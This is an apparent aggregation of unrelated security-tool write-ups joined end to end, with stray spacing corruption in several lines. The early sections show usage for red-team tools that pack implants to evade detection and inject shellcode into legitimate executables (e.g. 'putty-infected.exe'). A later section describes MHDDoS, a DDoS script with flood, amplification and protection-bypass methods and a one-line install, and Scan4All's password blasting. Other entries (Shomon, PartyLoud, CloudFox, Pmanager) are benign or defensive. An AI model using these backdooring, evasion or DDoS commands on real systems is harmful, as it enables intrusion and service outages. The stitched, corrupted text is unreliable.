2022-06-10 03:15:53,beacon-obf.exe,mgeeky@commandoVM,Obfuscation artifact: Hyperion(UPX(CallObf(<file>))),te   st,8b706ff39dd4c8f2b031c8fa6e3c25f5,c64aad468b1ecadada3557cb3f6371e899d59790,087c6353279eb5cf04715ef096a18f83ef8184aa52bc1d5884e33980028bc365,a46ea633057f9600559d5c6b328bf83d
2022-06-10 03:15:53,beacon-obf.exe,mgeeky@commandoVM,Output obfuscated artifact,test,043318125c60d36e0b745fd38582c0b8,a7717d1c47cbcdf872101bd488e53b8482202f7f,b3cf4311d249d4a981eb17a33c9b89eff656fff239e0d7bb044074018ec00e20,a46ea633057f9600559d5c6b328bf83d

C:\> py ProtectMyTooling.py -L
    [...]

    Red Team implants protection swiss knife.

    Multi-Packer wrapping around multitude of packers, protectors, shellcode loaders, encoders.
    Mariusz Banach / mgeeky '20-'22, <mb@binary-offensive.com>
    v0.15

+----+----------------+-------------+-----------------------+-----------------------------+------------------------+--------------------------------------------------------+
| #  |      Name      |     Type    |       Licensing       |            Input            |         Output         |                         Author                         |
+----+----------------+-------------+-----------------------+-----------------------------+------------------------+--------------------------------------------------------+
| 1  |     amber      | open-source |    Shellcode Loader   |              PE             |     EXE, Shellcode     |                       Ege B   alci                        |
| 2  | asstrongasfuck | open-source |    .NET Obfuscator    |             .NET            |          .NET          |                 Charterino, klezVirus                  |
| 3  |    backdoor    | open-source |    Shellcode Loader   |          Shellcode          |           PE           |              Mariusz Banach, @mariuszbit               |
| 4  |    callobf     | open-source |  PE EXE/DLL Protector |              PE             |           PE           |                Mustafa Mahmoud, @d35ha                 |
| 5  |   confuserex   | open-source |    .NET Obfuscator    |             .NET            |          .NET          |                        mkaring                         |
| 6  |  donut-packer  | open-source |  Shellcode Converter  | PE, .NET, VBScript, JScript |       Shellcode        |                        TheWover                        |
| 7  |     enigma     |  commercial |  PE EXE/DLL Protector |                 PE             |           PE           |          The Enigma Protector Developers Team          |
| 8  |    hyperion    | open-source |  PE EXE/DLL Protector |              PE             |           PE           |                   nullsecurity team                    |
| 9  |  intellilock   |  commercial |    .NET Obfuscator    |              PE             |           PE           |                         Eziriz                         |
| 10 |     invobf     | open-source | Powershell Obfuscator |          Powershell         |       Powershell       |                    Daniel Bohannon                     |
| 11 |    logicnet    | open-source |    .NET Obfuscator    |             .NET            |          .NET          |                 AnErrupTion, klezVirus                 |
| 12 |     mangle     | open-source |   Executable Signing  |              PE             |           PE           |                Matt Eidelberg (@Tyl0us)                |
|    13 |     mpress     |   freeware  | PE EXE/DLL Compressor |              PE             |           PE           |                    Vitaly Evseenko                     |
| 14 |   netreactor   |  commercial |    .NET Obfuscator    |             .NET            |          .NET          |                         Eziriz                         |
| 15 |   netshrink    | open-source |    .NET Obfuscator    |             .NET            |          .NET          |                     Bartosz Wójcik                     |
| 16 |   nimcrypt2    | open-source |    Shellcode Loader   |     PE, .NET, Shellcode     |           PE           |                       @icyguider                       |
| 17 |    nimpackt    | open-source |    Shellcode Loader   |       .NET, Shellcode       |           PE           |             Cas van Cooten (@chvancooten)              |
| 18 |   nimsyscall   | sponsorware |    Shellcode Loader   |     PE, .NET, Shellcode     |           PE              |                    @S3cur3Th1sSh1t                     |
| 19 |    packer64    | open-source | PE EXE/DLL Compressor |              PE             |           PE           |                  John Adams, @jadams                   |
| 20 |     pe2shc     | open-source |  Shellcode Converter  |              PE             |       Shellcode        |                      @hasherezade                      |
| 21 |    pecloak     | open-source |  PE EXE/DLL Protector |              PE             |           PE           |     Mike Czumak, @SecuritySift, buherator / v-p-b      |
| 22 |    peresed     | open-source |  PE EXE/DLL Protector |              PE             |           PE           |                  Martin Vejnár, Avast                  |
| 23 |   scarecrow    | open-source |    Shellcode Loader   |          Shellcode          | DLL, JScript, CPL, XLL |                Matt Eidelberg (@Tyl0us)                |
| 24 |      sgn       | open   -source |   Shellcode Encoder   |          Shellcode          |       Shellcode        |                       Ege Balci                        |
| 25 | smartassembly  |  commercial |    .NET Obfuscator    |             .NET            |          .NET          |                        Red-Gate                        |
| 26 |      srdi      | open-source |   Shellcode Encoder   |             DLL             |       Shellcode        |                Nick Landers, @monoxgas                 |
| 27 |    themida     |  commercial |  PE EXE/DLL Protector |              PE             |           PE           |                         Oreans                         |
| 28 |      upx       | open-source | PE EXE/DLL Compressor |              PE             |           PE           | Markus F.X.J. Oberhumer, László Molnár, John F. Reiser |
| 29 |   vmprotect    |  commercial |  PE EXE/DLL Protector |              PE             |           PE           |                           vmpsoft                         |
+----+----------------+-------------+-----------------------+-----------------------------+------------------------+--------------------------------------------------------+

py ProtectMyTooling [...] -w dos-stub=fooooobar -w checksum=0xaabbccdd -w section=.coco,ALLYOURBASEAREBELONG

py RedWatermarker.py beacon-obf.exe -c 0xaabbccdd -t fooooobar -e bazbazbaz -s .coco,ALLYOURBASEAREBELONG

cmd> py RedWatermarker.py --help

                      ;
                      ED.
                     ,E#Wi
  j.               f#iE###G.
  EW,            .E#t E#fD#W;
  E##j          i#W,  E#t t##L
  E###D.       L#D.   E#t  .E#K,
  E#jG#W;    :K#Wfff; E#t    j##f
  E#t t##f   i##WLLLLtE#t    :E#K:
  E#t  :K#E:  .E#L    E#t   t##L
  E#KDDDD###i   f#E:  E#t .D#W;                  ,;                                                      G:              ,;
  E#f,t#Wi,,,    ,WW; E#tiW#G.                 f#i j.                                          j.        E#,    :      f#i j.
  E#t  ;#W: ;     .D#;E#K##i .. GEEEEEEEL    .E#t  EW,                 ..       :           .. EW,       E#t  .GE    .E#t  EW,
  DWi   ,K.DL       ttE##D. ;W, ,;;L#K;;.   i#W,   E##j               ,W,     .Et          ;W, E##j      E#t j#K;   i#W,   E##j
  f.     :K#L     LWL E#t  j##,    t#E     L#D.    E###D.            t##,       ,W#t         j##, E###D.    E#GK#f    L#D.    E###D.
  EW:   ;W##L   .E#f  L:  G###,    t#E   :K#Wfff;  E#jG#W;          L###,   j###t        G###, E#jG#W;   E##D.   :K#Wfff;  E#jG#W;
  E#t  t#KE#L  ,W#;     :E####,    t#E   i##WLLLLt E#t t##f       .E#j##,  G#fE#t      :E####, E#t t##f  E##Wi   i##WLLLLt E#t t##f
  E#t f#D.L#L t#K:     ;W#DG##,    t#E    .E#L     E#t  :K#E:    ;WW; ##,:K#i E#t     ;W#DG##, E#t  :K#E:E#jL#D:  .E#L     E#t  :K#E:
  E#jG#f  L#LL#G      j###DW##,    t#E      f#E:   E#KDDDD###i  j#E.  ##f#W,  E#t    j###DW##, E#KDDDD###E#t ,K#j   f#E:   E#KDDDD###i
  E###;   L###j      G##i,,G##,    t#E       ,WW;  E#f,t#Wi,,,.D#L    ###K:   E#t   G##i,,G##, E#f,t#Wi,,E#t   jD    ,WW;  E#f,t#Wi,,,
  E#K:    L#W;     :K#K:   L##,    t#E        .D#; E#t  ;#W: :K#t     ##D.    E#t :K#K:   L##, E#t  ;#W: j#t          .D#; E#t  ;#W:
  EG      LE.     ;##D.    L##,     fE          tt DWi   ,KK:...      #G      .. ;##D.    L##, DWi   ,KK: ,;               tt DWi   ,KK:
  ;       ;@      ,,,      .,,       :                                j          ,,,      .,,


    Watermark thy implants, track them in VirusTotal
    Mariusz Banach / mgeeky '22, (@mariuszbit)
    <mb@binary-offensive.com>

usage: RedWatermarker.py [options] <infile>

options:
  -h, --help            show this help message and exit

Required arguments:
  infile                Input implant file

Optional arguments:
  -C, --check           Do not actually inject watermark. Check input file if it contains specified watermarks.
  -v, --verbose         Verbose mode.
  -d, --debug           Debug mode.
  -o PATH, --outfile PATH
                        Path where to save output file with watermark injected. If not given, will modify infile.

PE Executables Watermarking:
  -t STR, --dos-stub STR
                        Insert watermark into PE DOS Stub (Th   is program cannot be run...).
  -c NUM, --checksum NUM
                        Preset PE checksum with this value (4 bytes). Must be number. Can start with 0x for hex value.
  -e STR, --overlay STR
                        Append watermark to the file's Overlay (at the end of the file).
  -s NAME,STR, --section NAME,STR
                        Append a new PE section named NAME and insert watermark there. Section name must be shorter than 8 characters. Section will be marked Read-Only, non-executable.

PS> py ProtectMyTooling.py sgn,backdoor,amber beacon64.bin dbgview64-infected.exe -B dbgview64.exe

    ::::::::::.:::::::..      ...  :::::::::::.,::::::  .,-::::::::::::::::
     `;;;```.;;;;;;``;;;;  .;;;;;;;;;;;;;;;;;;;,;;;'````;;;;;;;;
      `]]nnn]]' [[[,/[[[' ,[[     \[[,  [[     [[cccc [[[           [[
       $$$""    $$$$$$c   $$$,     $$$  $$     $$"""" $$$           $$
       888o     888b "88bo"888,_ _,88P  88,    888oo,_`88bo,__,o,   88,
    .  YMMMb :.-:.MM   ::-. "YMMMMMP"   MMM    """"YUMMM"YUMMMMMP"  MMM
    ;;,.    ;;;';;.   ;;;;'
    [[[[, ,[[[[, '[[,[[['
    $$$$$$$$"$$$   c$$"
    888 Y88" 888o,8P"`
    ::::::::::::mM...        ...     :::    :::::.    :::. .,-:::::/
    ;;;;;;;;.;;;;;;;.  .;;;;;;;.  ;;;    ;;`;;;;,  `;;,;;-'````'
         [[   ,[[     \[[,[[     \[[,[[[    [[[ [[[[[. '[[[[   [[[[[[/
         $$   $$$,     $$$$$,     $$$$$'    $$$ $$$ "Y$c$"$$c.    "$$
         88,     "888,_ _,88"888,_ _,88o88oo,._888 888    Y88`Y8bo,,,o88o
         MMM    "YMMMMMP"  "YMMMMMP"""""YUMMMMM MMM     YM  `'YMUP"YMM

    Red Team implants protection swiss knife.

    Multi-Packer wrapping around multitude of packers, protectors, shellcode loaders, encoders.
    Mariusz Banach / mgeeky '20-'22, <mb@binary-offensive.com>
    v0.15

[.] Processing x64 file :  beacon64.bin
[>] Generating output of sgn(<file>)...
[>] Generating output of backdoor(sgn(<file>))...
[>] Generating output of Amber(backdoor(sgn(<file>)))...

[+] SUCCEEDED. Original file size: 265959 bytes, new file size Amber(backdoor(sgn(<file>))): 1372672, ratio: 516.12%

cmd> py RedBackdoorer.py --help

     ██▀███ ▓█████▓█████▄
    ▓██ ▒ ██▓█   ▀▒██▀ ██▌
    ▓██ ░▄█ ▒███  ░██   █▌
    ▒██▀▀█▄ ▒▓█  ▄░▓█▄   ▌
    ░██▓ ▒██░▒████░▒████▓
    ░ ▒▓ ░▒▓░░ ▒░ ░▒▒▓  ▒
      ░▒ ░ ▒░░ ░  ░░ ▒  ▒
      ░░   ░   ░   ░ &#   9617;  ░
     ▄▄▄▄   ▄▄▄░  ░  ▄████▄  ██ ▄█▓█████▄ ▒█████  ▒█████  ██▀███ ▓█████ ██▀███
    ▓█████▄▒████▄  ░▒██▀ ▀█  ██▄█▒▒██▀ ██▒██▒  ██▒██▒  ██▓██ ▒ ██▓█   ▀▓██ ▒ ██▒
    ▒██▒ ▄█▒██  ▀█▄ ▒▓█    &#9   604;▓███▄░░██   █▒██░  ██▒██░  ██▓██ ░▄█ ▒███  ▓██ ░▄█ ▒
    ▒██░█▀ ░██▄▄▄▄██▒▓▓▄ ▄██▓██ █▄░▓█▄   ▒██   ██▒██   ██▒██▀▀█▄ ▒▓█  ▄▒██▀▀█▄
    ░▓█  ▀█▓▓█   ▓██▒ ▓███▀ ▒██▒ █░▒████▓░ ████▓▒   ░ ████▓▒░██▓ ▒██░▒████░██▓ ▒██▒
    ░▒▓███▀▒▒▒   ▓▒█░ ░▒ ▒  ▒ ▒▒ ▓▒▒▒▓  ▒░ ▒░▒░▒░░ ▒░▒░▒░░ ▒▓ ░▒▓░░ ▒░ ░ ▒▓ ░▒▓░
    ▒░▒   ░  ▒   ▒▒ ░ ░  ▒  ░ ░▒ ▒░░ ▒  ▒  ░ ▒ ▒░  ░ ▒ ▒░  ░▒ ░ ▒░░ ░  ░ ░▒ ░ ▒░
     ░    ░  ░   ▒  &#9   617;       ░ ░░ ░ ░ ░  ░░ ░ ░ ▒ ░ ░ ░ ▒   ░░   ░   ░    ░░   ░
     ░           ░  ░ ░     ░  ░     ░       ░ ░     ░ ░    ░       ░  ░  ░
          ░         ░              ░


    Your finest PE backdooring companion.
    Mariusz Banach / mgeeky '22, (@mariuszbit)
    <mb@binary-offensive.com>

usage: RedBackdoorer.py [options] <mode> <shellcode> <infile>

options:
  -h, --help            show this help message and exit

Required arguments:
  mode                  PE Injection mode, see help epilog for more details.
  shellcode             Input shellcode file
  infile                PE file to backdoor

Optional arguments:
  -o PATH, --outfil   e PATH
                        Path where to save output file with watermark injected. If not given, will modify infile.
  -v, --verbose         Verbose mode.

Backdooring options:
  -n NAME, --section-name NAME
                        If shellcode is to be injected into a new PE section, define that section name. Section name must not be longer than 7 characters. Default: .qcsw
  -i IOC, --ioc IOC     Append IOC watermark to injected shellcode to facilitate implant tracking.

Authenticode signature options:
  -r, --remove-signature
                        Remove PE Authenticode digital signature since its going to be invalidated anyway.

------------------

PE Backdooring <mode> consists of two comma-separated options.
First one denotes where to store shellcode, second how to run it:

<mode>

    save,run
      |   |
      |   +---------- 1 - change AddressOfEntryPoint
      |                  2 - hijack branching instruction at Original Entry Point (jmp, call, ...)
      |               3 - setup TLS callback
      |
      +-------------- 1 - store shellcode in the middle of a code section
                      2 - append shellcode to the PE file in a new PE section
Example:

    py RedBackdoorer.py 1,2 beacon.bin putty.exe putty-infected.exe

   Mariusz Banach / mgeeky, '20-'22
   <mb [at] binary-offensive.com>
   (https://github.com/mgeeky) 

Shomon - Shodan Monitoring Integration For TheHive

ShoMon is a Shodan alert feeder for TheHive written in GoLang. With version 2.0, it is more powerful than ever!

Functionalities

• Can be used as Webhook OR Stream listener

  • Webhook listener opens a restful API endpoint for Shodan to send alerts. This means you need to make this endpoint available to public net
  • Stream listener connects to Shodan and fetches/parses the alert stream

• Utilizes shadowscatcher/shodan (fantastic work) for Shodan interaction.

• Console logs are in JSON format and can be ingested by any other further log management tools

• CI/CD via Github Actions ensures that a proper Release with changelogs, artifacts, images on ghcr and dockerhub will be provided

• Provides a working docker-compose file file for TheHive, dependencies

• Super fast and Super mini in size

• Complete code refactoring in v2.0 resulted in more modular, maintainable code

• Via conf file or environment variables alert specifics including tags, type, alert-template can be dynamically adjusted. See config file.

• Full banner can be included in Alert with direct link to Shodan Finding.

  

• IP is added to observables

  

Usage

• Parameters should be provided via conf.yaml or environment variables. Please see config file and docker-compose file

• After conf or environment variables are set simply issue command:

  ./shomon

Notes

• Alert reference is first 6 chars of md5("ip:port")
• Only 1 mod can be active at a time. Webhook and Stream listener can not be activated together.

Setup & Compile Instructions

Get latest compiled binary from releases

1. Check Releases section.

Compile from source code

1. Make sure that you have a working Golang workspace.
2. go build .
   • go build -ldflags="-s -w" . could be used to customize compilation and produce smaller binary.

Using Public Container Registries

1. Thanks to new CI/CD integration, latest versions of built images are pushed to ghcr, DockerHub and can be utilized via:
   • docker pull ghcr.io/kaansk/shomon
   • docker pull kaansk/shomon

Using Dockerfile

1. Edit config file or provide environment variables to commands bellow
2. docker build -t shomon .
3. docker run -it shomon

Using docker-compose file

1. Edit environment variables and configurations in docker-compose file
2. docker-compose run -d

Credits

• Logo Made via LogoMakr.com
• shadowscatcher/shodan
• Dockerfile Reference
• Release management with GoReleaser

MHDDoS - DDoS Attack Script With 56 Methods

Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods 

Please Don't Attack websites without the owners consent.

Features And Methods

• Layer7
  • GET | GET Flood
  • POST | POST Flood
  • OVH | Bypass OVH
  • RHEX | Random HEX
  • STOMP | Bypass chk_captcha
  • STRESS | Send HTTP Packet With High Byte
  • DYN | A New Method With Random SubDomain
  • DOWNLOADER | A New Method of Reading data slowly
  • SLOW | Slowloris Old Method of DDoS
  • HEAD | https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/HEAD
  • NULL | Null UserAgent and ...
  • COOKIE | Random Cookie PHP 'if (isset($_COOKIE))'
  • PPS | Only 'GET / HTTP/1.1\r\n\r\n'
  • EVEN | GET Method with more header
  • GSB | Google Project Shield Bypass
  • DGB | DDoS Guard Bypass
  • AVB | Arvan Cloud Bypass
  • BOT | Like Google bot
  • APACHE | Apache Expliot
  • XMLRPC | WP XMLRPC expliot (add /xmlrpc.php)
  • CFB | CloudFlare Bypass
  • CFBUAM | CloudFlare Under Attack Mode Bypass
  • BYPASS | Bypass Normal AntiDDoS
  • BOMB | Bypass with codesenberg/bombardier
  • KILLER | run many threads to kill a target
  • TOR | Bypass onion website

• Layer4:
  • TCP | TCP Flood Bypass
  • UDP | UDP Flood Bypass
  • SYN | SYN Flood
  • CPS | Open and close connections with proxy
  • ICMP | Icmp echo request flood (Layer3)
  • CONNECTION | Open connection alive with proxy
  • VSE | Send Valve Source Engine Protocol
  • TS3 | Send Teamspeak 3 Status Ping Protocol
  • FIVEM | Send Fivem Status Pi ng Protocol
  • MEM | Memcached Amplification
  • NTP | NTP Amplification
  • MCBOT | Minecraft Bot Attack
  • MINECRAFT | Minecraft Status Ping Protocol
  • MCPE | Minecraft PE Status Ping Protocol
  • DNS | DNS Amplification
  • CHAR | Chargen Amplification
  • CLDAP | Cldap Amplification
  • ARD | Apple Remote Desktop Amplification
  • RDP | Remote Desktop Protocol Amplification

• ⚙️ Tools - Run With python3 start.py tools
  • CFIP | Find Real IP Address Of Websites Powered By Cloudflare
  • DNS | Show DNS Records Of Sites
  • TSSRV | TeamSpeak SRV Resolver
  • PING | PING Servers
  • CHECK | Check If Websites Status
  • DSTAT | That Shows Bytes Received, bytes Sent and their amount

• Other
  • STOP | STOP All Attacks
  • TOOLS | Console Tools
  • HELP | Show Usage Script

If u Like the project Leave a star on the repository!

Downloads

You can download it from GitHub Releases

Getting Started

Requirements

• dnspython
• cfscrape
• impacket
• requests
• Python3
• PyRoxy
• icmplib
• certifi
• psutil
• yarl

Videos

• Aparat: https://www.aparat.com/v/bHcP9
• YouTube : Coming soon...

Tutorial

• Aprat : https://aparat.com/v/XPn5Z
• YouTube : Coming soon...

Documentation

You can read it from GitHub Wiki

Clone and Install Script

git clone https://github.com/MatrixTM/MHDDoS.git
cd MHDDoS
pip install -r requirements.txt

One-Line Installing on Fresh VPS

apt -y update && apt -y install curl wget libcurl4 libssl-dev python3 python3-pip make cmake automake autoconf m4 build-essential ruby perl golang git && git clone https://github.com/MatrixTM/MHDDoS.git && cd MH* && pip3 install -r requirements.txt

• https://idpay.ir/mh-prodev

PartyLoud - A Simple Tool To Generate Fake Web Browsing And Mitigate Tracking

PartyLoud is a highly configurable and straightforward free tool that helps you prevent tracking directly from your linux terminal, no special skills required. Once started, you can forget it is running. It provides several flags; each flag lets you customize your experience and change PartyLoud behaviour according to your needs.

• Simple. 3 files only, no installation required, just clone this repo an you're ready to go.
• Powerful. Thread-based navigation.
• Stealthy. Optimized to emulate user navigation.
• Portable. You can use this script on every unix-based OS.

This project was inspired by noisy.py

How It Works

1. URLs and keywords are loaded (either from partyloud.conf and badwords or from user-defined files)
2. If proxy flag has been used, proxy config will be tested
3. For each URL in ULR-list a thread is started, each thread as an user agent associated
4. Each thread will start by sending an HTTP request to the given URL
5. The response if filtered using the keywords in order to prevent 404s and malformed URLs
6. A new URL is choosen from the list generated after filering
7. Current thread sleeps for a random time
8. Actions from 4 to 7 are repeated using the new URL until user send kill signal (CTRL-C or enter key)

Features

• Configurable urls list and blocklist
• Random DNS Mode : each request is done on a different DNS Server
• Multi-threaded request engine (# of thread are equal to # of urls in partyloud.conf)
• Error recovery mechanism to protect Engines from failures
• Spoofed User Agent prevent from fingerprinting (each engine has a different user agent)
• Dynamic UI

Setup

Clone the repository:

git clone https://github.com/realtho/PartyLoud.git

Navigate to the directory and make the script executable:

cd PartyLoud
chmod +x partyloud.sh

Run 'partyloud':

./partyloud.sh

Usage

Usage: ./partyloud.sh [options...]

-d --dns <file>                    DNS Servers are sourced from specified FILE,
                                   each request will use a different DNS Server
                                   in the list
                                   !!WARNING THIS FEATURE IS EXPERIMENTAL!!
                                   !!PLEASE LET ME KNOW ISSUES ON GITHUB !!
-l --url-list <file>               read URL list from specified FILE
-b --blocklist <file>              read blocklist from specified FILE
-p --http-proxy <http://ip:port>   set a HTTP proxy
-s --https-proxy <https://ip:port> set a HTTPS proxy
-n --no-wait                       disable wait between one request and an other
-h --help                          dispaly this help

To stop the script press either enter or CRTL-C

 

File Specifications

In current release there is no input-validation on files.
If you find bugs or have suggestions on how to improve this features please help me by opening issues on GitHub

Intro

If you don’t have special needs , default config files are just fine to get you started.

Default files are located in:

• badwords
• partyloud.conf
• DNSList

Please note that file name and extension are not important, just content of files matter

badwords - Keywords-based blocklist

badwords is a keywords-based blocklist used to filter non-HTML content, images, document and so on.
The default config as been created after several weeks of testing. If you really think you need a custom blocklist, my suggestion is to start by copy and modifying default config according to your needs.
Here are some hints on how to create a great blocklist file:

partyloud.conf - ULR List

partyloud.conf is a ULR List used as starting point for fake navigation generators.
The goal here is to create a good list of sites containing a lot of URLs.
Aside suggesting you not to use google, youtube and social networks related links, I've really no hints for you.

Note #1 - To work properly the URLs must be well-formed

Note #2 - Even if the file contains 1000 lines only 10 are used (first 10, working on randomness)

Note #3 - Only one URL per line is allowed

DNSList - DNS List

DNSList is a List of DNS used as argument for random DNS feature. Random DNS is not enable by default, so the “default file” is really just a guide line and a test used while developing the function to se if everything was working as expected.
The only suggestion here is to add as much address as possible to increase randomness.

Note #1 - Only one address per line is allowed

Cloudfox - Automating Situational Awareness For Cloud Penetration Tests

CloudFox helps you gain situational awareness in unfamiliar cloud environments. It’s an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure.

CloudFox helps you answer the following common questions (and many more):

• What regions is this AWS account using and roughly how many resources are in the account?
• What secrets are lurking in EC2 userdata or service specific environment variables?
• What actions/permissions does this [principal] have?
• What roles trusts are overly permissive or allow cross-account assumption?
• What endpoints/hostnames/IPs can I attack from an external starting point (public internet)?
• What endpoints/hostnames/IPs can I attack from an internal starting point (assumed breach within the VPC)?
• What filesystems can I potentially mount from a compromised resource inside the VPC?

Quick Start

CloudFox is modular (you can run one command at a time), but there is an aws all-checks command that will run the other aws commands for you with sane defaults:

cloudfox aws --profile [profile-name] all-checks

CloudFox is designed to be executed by a principal with limited read-only permissions, but it's purpose is to help you find attack paths that can be exploited in simulated compromise scenarios (aka, objective based penetration testing).

For the full documentation please refer to our wiki.

Supported Cloud Providers

Install

Option 1: Download the latest binary release for your platform.

Option 2: Install Go, clone the CloudFox repository and compile from source

# git clone https://github.com/BishopFox/cloudfox.git
...omitted for brevity...
# cd ./cloudfox
# go build .
# ./cloudfox

Prerequisites

AWS

• AWS CLI installed
• Supports AWS profiles, AWS environment variables, or metadata retrieval (on an ec2 instance)
• A principal with one recommended policies attached (described below)
• Recommended attached policies: SecurityAudit + CloudFox custom policy

Additional policy notes (as of 09/2022):

Azure

• Viewer or similar permissions applied.

Supported Commands

Authors

• Carlos Vendramini
• Seth Art (@sethsec)

Contributing

Wiki - How to Contribute

TODO

• AWS - Add support for GovCloud and China regions
• AWS - Add support for hardcoded region (which would override the default of looking in every region)

FAQ

How does CloudFox compare with ScoutSuite, Prowler, Steampipe's AWS Compliance Module, AWS Security Hub, etc.

CloudFox doesn't create any alerts or findings, and doesn't check your environment for compliance to a baseline or benchmark. Instead, it simply enables you to be more efficient during your manual penetration testing activities. If gives you the information you'll likely need to validate whether an attack path is possible or not.

Why do I see errors in some CloudFox commands?

• Services that don't exist in all regions - CloudFox currently makes the same API calls to every region. However, not all regions support all services. For instance, services like Appstream and AWS Grafana are only supported in a subset of the total regions. In the future, we plan to make CloudFox aware of which services run in each region.
• You don't have permission - Another reason you might see errors if you don't have permissions to make calls that CloudFox is making. Either because the policy doesn't allow it (e.g., SecurityAudit doesn't allow all of the permissions CloudFox needs. Or, it might be an SCP that is blocking you.

You can always look in the ~/.cloudfox/cloudfox-error.log file to get more information on errors.

Prior work and other related projects

• SmogCloud - Inspiration for the endpoints command
• SummitRoute's AWS Exposable Resources - Inspiration for the endpoints command
• Steampipe - We used steampipe to prototype many cloudfox commands. While CloudFox is laser focused on helping cloud penetration testers, steampipe is an easy way to query any and all of your cloud resources.
• Principal Mapper - Inspiration for, and a strongly recommended partner to the iam-simulator command
• Cloudsplaining - Inspiration for the permissions command
• ScoutSuite - Excellent cloud security benchmark tool. Provided inspiration for the --userdata functionality in the instances command, the permissions command, and many others
• Prowler - Another excellent cloud security benchmark tool.
• Pacu - Excellent cloud penetration testing tool. PACU has quite a few enumeration commands similar to CloudFox, and lots of other commands that automate exploitation tasks (something that CloudFox avoids by design)
• CloudMapper - Inspiration for the inventory command and just generally CloudFox as a whole

FBI, CISA, and NSA Reveal How Hackers Targeted a Defense Industrial Base Organization

Bayanay - Python Wardriving Tool

WarDriving is the act of navigating, on foot or by car, to discover wireless networks in the surrounding area.

Features

Wardriving is done by combining the SSID information obtained with scapy using the HTML5 geolocation feature.

Usage

I cannot be held responsible for the malicious use of the vehicle.

ssidBul.py has been tested via TP-LINK TL WN722N.

Selenium 3.11.0 and Firefox 59.0.2 are used for location.py. Firefox geckodriver is located in the directory where the codes are.

SSID and MAC names and location information were created and changed in the test environment.

ssidBul.py and location.py must be run concurrently.

ssidBul.py result:

20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M

20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068

Here is a screenshot of allowing location information while running location.py:

The screenshot of the location information is as follows:

konum.py result:

lat=38.8333635|lon=34.759741899|20 March 2018 11:47PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM

After the data collection processes, the following output is obtained as a result of running wardriving.py:

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken

Pmanager - Store And Retrieve Your Passwords From A Secure Offline Database. Check If Your Passwords Has Leaked Previously To Prevent Targeted Password Reuse Attacks

Demo

Description

Store and retrieve your passwords from a secure offline database. Check if your passwords has leaked previously to prevent targeted password reuse attacks.

Why develop another password manager ?

• This project was initially born from my desire to learn Rust.
• I was tired of using the clunky GUI of keepassxc.
• I wanted to learn more about cryptography.
• For fun. :)

Features

• Secure password storage with state of the art cryptographic algorithms.
  • Multiple iterations of argon2id for key derivation to make it harder for attacker to conduct brute force attacks.
  • Aes-gcm256 for database encryption.
• Custom encrypted key-value database which ensures data integrity.(Read the blog post I wrote about it here.)
• Easy to install and to use. Does not require connection to an external service for its core functionality.
• Check if your passwords are leaked before to avoid targeted password reuse attacks.
  • This works by hashing your password with keccak-512 and sending the first 10 digits to XposedOrNot.

Installation

Pmanager depends on "pkg-config" and "libssl-dev" packages on ubuntu. Simply install them with

sudo apt install pkg-config libssl-dev -y

Download the binary file according to your current OS from releases, and add the binary location to PATH environment variable and you are good to go.

Building from source

Ubuntu & WSL

sudo apt update -y && sudo apt install curl
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
sudo apt install build-essential -y
sudo apt install pkg-config libssl-dev git -y
git clone https://github.com/yukselberkay/pmanager
cd pmanager
make install

Windows

• Follow the instructions here to install Rust. -> https://www.rust-lang.org/tools/install
• Then install git for Windows. -> https://gitforwindows.org/

git clone https://github.com/yukselberkay/pmanager
cd pmanager
cargo build --release

Mac

I have not been able to test pmanager on a Mac system. But you should be able to build it from the source ("cargo build --release"). since there are no OS specific functionality.

Documentation

Firstly the database needs to be initialized using "init" command.

Init

# Initializes the database in the home directory.
pmanager init --db-path ~

Insert

# Insert a new user and password pair to the database.
pmanager insert --domain github.com

Get

# Get a specific record by domain.
pmanager get --domain github.com

List

# List every record in the database.
pmanager list

Update

# Update a record by domain.
pmanager update --domain github.com

Delete

# Deletes a record associated with domain from the database.
pmanager delete github.com

Leaked

# Check if a password in your database is leaked before.
pmanager leaked --domain github.com

pmanager 1.0.0

USAGE:
    pmanager [OPTIONS] [SUBCOMMAND]

OPTIONS:
    -d, --debug      
    -h, --help       Print help information
    -V, --version    Print version information

SUBCOMMANDS:
    delete    Delete a key value pair from database
    get       Get value by domain from database
    help      Print this message or the help of the given subcommand(s)
    init      Initialize pmanager
    insert    Insert a user password pair associated with a domain to database
    leaked    Check if a password associated with your domain is leaked. This option uses
xposedornot api. This check achieved by hashing specified domain's password and
                  sending the first 10 hexade   cimal characters to xposedornot service
    list      Lists every record in the database
    update    Update a record from database

Roadmap

• Unit tests
• Automatic copying to clipboard and cleaning it.
• Secure channel to share passwords in a network.
• Browser extension which integrates with offline database.

Support

Bitcoin Address -> bc1qrmcmgasuz78d0g09rllh9upurnjwzpn07vmmyj

Improve your security posture with Wazuh, a free and open source XDR

Scan4All - Vuls Scan: 15000+PoCs; 21 Kinds Of Application Password Crack; 7000+Web Fingerprints; 146 Protocols And 90000+ Rules Port Scanning; Fuzz, HW, Awesome BugBounty...

• What is scan4all: integrated vscan, nuclei, ksubdomain, subfinder, etc., fully automated and intelligent。red team tools Code-level optimization, parameter optimization, and individual modules, such as vscan filefuzz, have been rewritten for these integrated projects. In principle, do not repeat the wheel, unless there are bugs, problems
• Cross-platform: based on golang implementation, lightweight, highly customizable, open source, supports Linux, windows, mac os, etc.
• Support [21] password blasting, support custom dictionary, open by "priorityNmap": true
  • RDP
  • SSH
  • rsh-spx
  • Mysql
  • MsSql
  • Oracle
  • Postgresql
  • Redis
  • FTP
  • Mongodb
